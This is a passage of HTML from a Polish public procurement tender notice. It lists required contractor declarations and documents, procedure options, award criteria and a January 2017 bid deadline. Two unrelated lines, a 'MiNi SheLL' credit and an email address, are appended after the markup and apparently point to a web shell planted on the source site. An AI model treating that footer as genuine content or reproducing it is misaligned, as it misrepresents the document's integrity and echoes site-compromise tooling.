                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23. Wraz ze złożeniem oświadczenia wg wzoru stanowiącego załącznik nr 6 do SIWZ, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
Wykonawca, którego oferta zostanie najwyżej oceniona na podstawie kryteriów oceny ofert, na wezwanie Zamawiającego, w terminie 5 dni zobowiązany będzie do przedłożenia dokumentów potwierdzających brak podstaw do wykluczenia z postępowania oraz potwierdzających spełnianie warunków udziału w postępowaniu.
a)Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.  </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają uprawnienia do wykonywania działalności objętej przedmiotem zamówienia, na dowód tego złożą oświadczenie wzór załącznik nr 2 do SIWZ.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Wykonawcy ubiegający się o zamówienie spełnią warunek dotyczący zdolności technicznej lub zawodowej, jeżeli oświadczą zgodnie z załącznikiem nr 2 do SIWZ.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Do oferty Wykonawcy załączają:
a)  Oferta wg wzoru   załącznik nr 1 do SIWZ
b) Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 Ustawy Prawo zamówień publicznych, sporządzone wg wzoru - załącznik nr 2 do SIWZ
c)Oświadczenie o braku podstaw do wykluczenia wg wzoru  załącznik nr 3 do SIWZ.
d) Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w przypadku gdy jest to wymagane są członkami właściwej izby samorządu zawodowego oraz posiadają ubezpieczenie od odpowiedzialności cywilnej za szkody, do których może dojść w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie wg wzoru - załącznik nr 4 do SIWZ.
e) Wskazać części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom wg wzoru  załącznik nr 5 do SIWZ. Jeżeli Wykonawca nie będzie  korzystał z podwykonawców wówczas w załączniku nr 5 wpisuje Nie dotyczy. 
UWAGA: W przypadku korzystania z podwykonawców, przed podpisaniem umowy z podwykonawcą   Wykonawca przedłoży Zamawiającemu wzór umowy z podwykonawcą.
f) Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą; przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba, że z treści pełnomocnictwa wynika co innego.

2. Wykonawca, którego oferta zostanie najwyżej oceniona na podstawie kryteriów oceny ofert, na wezwanie Zamawiającego, w terminie 5 dni zobowiązany będzie do przedłożenia dokumentów potwierdzających brak podstaw do wykluczenia z postępowania oraz potwierdzających spełnianie warunków udziału w postępowaniu.
a) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. 
3. W przypadku Wykonawców występujących wspólnie na podstawie art. 23 Ustawy Prawo zamówień publicznych do oferty należy dołączyć dokumenty:
1. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do oferty należy dołączyć dokumenty: 
- pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego,                    o którym mowa w art. 23 ustawy, 
- Oświadczenie o braku podstaw do wykluczenia wg wzoru  załącznik nr 3 do SIWZ.
- oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej zgodnie                z załącznikiem nr 6 do SIWZ 
- Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
 muszą być złożone przez każdy podmiot,  
-   pozostałe dokumenty wymienione w cz. IV podmioty składają wspólnie jako konsorcjum,    
4. Dokumenty podmiotów zagranicznych:
W przypadku Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  mają zastosowanie przepisy zawarte w § 7  ust. 1 Rozporządzenia Ministra Rozwoju z dnia                  26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy                    w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r., poz. 1126) 
1. W związku z powyższym, zamiast dokumentów, o których mowa w pkt IV 2a)  SIWZ składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2. Dokumenty, o których mowa w ppkt 5.1 lit.a powinny być wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsca zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy  nie wydaje się dokumentów, o których mowa w pkt.1., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji wykonawcy, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub  przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę  lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu. 

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający może wyrazić zgodę na zmianę postanowień umowy takich jak termin wykonania zamówienia, wysokości wynagrodzenia pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub w przypadku zmiany terminu wykonania zamówienia wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (np.: zwłoka lub odmowa w wydawaniu uzgodnień i pozwoleń przez odpowiednie urzędy), a w przypadku zmiany wysokości wynagrodzenia wynikać będą ze zmiany stawki podatki VAT. Zmiana postanowień umowy może być dokonana tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/01/2017, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              oferty należy składać w języku polskim <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com